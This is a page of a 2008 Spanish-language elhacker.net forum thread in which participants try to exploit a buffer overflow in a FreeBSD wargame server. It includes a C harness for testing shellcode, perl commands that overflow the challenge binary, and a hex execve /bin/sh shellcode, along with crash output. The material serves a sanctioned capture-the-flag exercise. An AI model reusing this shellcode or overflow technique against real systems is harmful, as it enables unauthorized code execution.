elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad
| | |-+  Desafíos - Wargames
| | | |-+  WarZone (Moderador: sirdarckcat)
| | | | |-+  Torneo de explotacion de servidores
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 Ir Abajo Respuesta Imprimir
Autor Tema: Torneo de explotacion de servidores  (Leído 72,638 veces)
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Torneo de explotacion de servidores
« Respuesta #50 en: 29 Noviembre 2008, 14:33 pm »

Ya estoy dentro desde ayer XD, pero eso es la primera parte, cuando estes dentro te daras cuenta que apenas empieza esto..

-berz3k.

@Anon

Esta muy raro todo, platicando con sdc  esta algo incomodo jugar XDD , el primer BoF aveces funciona y aveces se frezzea no entiendo..

Código:
???????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????°1I?%A1A°↨I?1U1A°↨I?ë▼^%1A%F♀^F°♂%ó??V♀I?1U%O@I?èÜ ÿÿ/bin/shDè¿¿Dè¿¿
Bad system call
C:/Users/root/Desktop


« Última modificación: 29 Noviembre 2008, 14:35 pm por berz3k » En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #51 en: 29 Noviembre 2008, 15:19 pm »

La cosa va bien :D

Disculpen las molestias tecnicas, si a alguien no se le dejo entrar la hora anterior.
Fue culpa del ISP. que de porsi no dejo hacerlo todo como esta planeado desde el principio. verdad sdc???

Este... Pues seria combeniente que antes de trartar de explotar el bof.

Se pruebe si el shellcode Funciona bien en el sistema. Ya saben a que me refiero.
Ya que ese Bad System Call me suena que no va todo bien.
En fin suerte a todos.

Saludos.


« Última modificación: 29 Noviembre 2008, 16:51 pm por Anon » En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #52 en: 29 Noviembre 2008, 16:07 pm »

Efectivamente no estas usando el shellcode correcto.
Lo probe mandandolo solo a ejecutar:
Código:
int main()      {
        void (*run)()=(void *)shellcode;
        printf("%d bytes \n",strlen(shellcode));
        run();

        return 0;
}

%gcc testsh.c -o testsh
%./testsh
65 bytes
Bad system call

Busca alguno de los shellcode que he puesto yo.

Saludos.
« Última modificación: 29 Noviembre 2008, 16:18 pm por Anon » En línea

sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #53 en: 29 Noviembre 2008, 19:17 pm »

¿No hay pistas?
Seh, NO ES VULNERABILIDAD NIVEL WEB.

Solo hay 1 puerto abierto en el servidor.

La primera parte del reto es encontrar la shell.

lalala..
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #54 en: 29 Noviembre 2008, 21:14 pm »

Ya entré.

Citar
Mas facil no se puede xD
    Se esperaban Parametros!!
Uso:
        %s <algo>
  Usted paso como parametro lo siguiente:

%s
 calloc(): %s

Esto me recuerda y si es que no me equivoco debe ser el mismo, la prueba que hicieron hace tiempo en la sección de wargames donde alguien prestó su servidor con el mismo sistema donde estamos ahora y al parecer con el mismo programa y con la misma falla  :P solo que la shell no es una shell sino que es un pipe a quien sabe donde.

De todas formas intenté:
Citar
sh ./validar `perl -e 'print "?" x 1036'`
aunque en checker y BoF me dió lo mismo: nada.

No soy tan bueno para los bof como berz3k :P

PD: hacen mas de 30 grados de calor y me duele la cabeza a mares :-\
PD2: Busqué en los post anteriores del foro de wargames hasta la última página y ya no está  :huh: supongo que no lo movieron/borraron apropósito vdd?
« Última modificación: 29 Noviembre 2008, 21:24 pm por WHK » En línea

AlbertoBSD
Programador y
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.705


🏴 Libertad!!!!!


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #55 en: 29 Noviembre 2008, 21:44 pm »

:D bien.

No no se ha borrado, y no esta en wargames.

Saludos.
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #56 en: 30 Noviembre 2008, 00:12 am »

Citar
$FreeBSD: src/lib/csu/i386-elf/crti.S,v 1.7 2005/05/19 07:31:06 dfr Exp $  Adv
ertencia "/usr/home/warzone/validar"
Solo puede ser ejecutado 10 veces por Usted
Esta vez no cuenta solo le informa el uso:
        Debera ejecutarlo usando path absoluto o relativo
        da igual esto es asu gusto.
Se le pedira el hash del reto N, donde N el ultimo reto que ha Ejecutado
Esto es por seguridad y para evitar un ForceBrute.
Note que cada vez que ejecute los programas vulnerables se va
a generar un Hash Aleatorio

        Saludos y Suerte.

Anon.
 /usr/home/warzone/.db/count_ /usr/home/warzone/.db/reto_ %s%d r+ %s w fopen():
%s r    Usted no a ejecutado ningun Reto!
No cuenta esta ejecucion Ejecutado: %d
 Hash de la Prueba %d:  Perfecto ;)    /usr/home/warzone/.db/grupos %d %d %d No
es Igual!! ;(  Lo sentimos ya ha sobrepaso el limite de Ejecuciones!!
 Guadar calloc(): %s $FreeBSD: src/lib/csu/i386-elf/crtn.S,v 1.6 2005/05/19 07:3
   \♦   $♣   á♠   Óü♦ ¶á┤î    ☺   §   ♀   îà♦

Como es que puedo ejecutarlo solo 10 veces si cuando lo ejecuto me da errores
Citar
sh ./validar
‼4: not found
⌂ELF☺☺☺: not found
./validar: 4: Syntax error: "(" unexpected (expecting ")")

No sabía que solo se podía ejecutar 10 veces :-s talves ya la jodí jajaja o talves se ejecute bién cuando logre pasar la primera parte no se pero bueno.

PD: Olvidalo ya se que pasó y estoy viendo lo de la shellcode.
« Última modificación: 30 Noviembre 2008, 00:52 am por WHK » En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #57 en: 30 Noviembre 2008, 02:01 am »

Ya, me aburrí, mañana será otro dia  :P

Citar
./BoF `perl -e 'print "?" x 998'``../xxx/shellcode`
./BoF `perl -e 'print "?" x 1036'``../xxx/shellcode`

Citar
Segmentation fault

Probé del 990 al 1070 para ver si me habia equibocado en el tamaño de la shellcode pero nada. y pruebo la shellcode y me lanza la shell pero al bolcar el buffer sobre el BoF no funciona. Para eso tube que modificar de la ejecución a printf guiandome por goodfellas (http://goodfellas.shellcode.com.ar/bsd.html).

Citar
$ ./BoF `perl -e 'print "?" x 1035'``../xxx/shellcode`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$

Tampoco ..

Citar
./BoF `perl -e 'print "?" x 1056 . "\xeb\x17\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x50\x8d\x53\x08\x52\x53\xb0\x3b\x50\xcd\x80\xe8\xe4\xff\xff\xff/bin/sh";'`
Mas facil no se puede xD
Usted paso como parametro lo siguiente:
...
Segmentation fault
$
[/quote]

Tampoco, shaaaaaa  :rolleyes:

Citar
???????????????????????????????????????Ù↨[1└êCëëC♀PìRS░;P═ÇÞõ   /bin/sh
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
/libexec/ld-elf.so.1: environment corrupt; missing value for ☻
chown: not found
chown: not found
Mas facil no se puede xD
Usted paso como parametro lo siguiente:

¾Ý┐┐☺¯┐┐↕¯┐┐&¯┐┐N¯┐┐V¯┐┐c¯┐┐ǯ┐┐ø¯┐┐ª¯┐┐▓¯┐┐┐¯┐┐╦¯┐┐ί┐┐>´┐┐J´┐┐P´┐┐_´┐┐n´┐┐Ç´┐┐
ò´┐┐ª´┐┐
Segmentation fault
$
« Última modificación: 30 Noviembre 2008, 02:33 am por WHK » En línea

NewLog


Desconectado Desconectado

Mensajes: 329



Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #58 en: 30 Noviembre 2008, 02:28 am »

Warzone está caído? Ahora mismo no puedo acceder...
En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.605


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Torneo de explotacion de servidores
« Respuesta #59 en: 30 Noviembre 2008, 02:35 am »

Si, no se ve pero la shell anda impecable porque no está dentro del servidor del wargame.

http://shell.wargame.elhacker.net/
En línea

Páginas: 1 2 3 4 5 [6] 7 8 9 10 11 12 13 14 15 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Nuevo conjunto de herramientas de explotación de IceApple implementado en servidores de Microsoft Exchange
Noticias
r32 0 2,216 Último mensaje 11 Mayo 2022, 22:19 pm
por r32
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines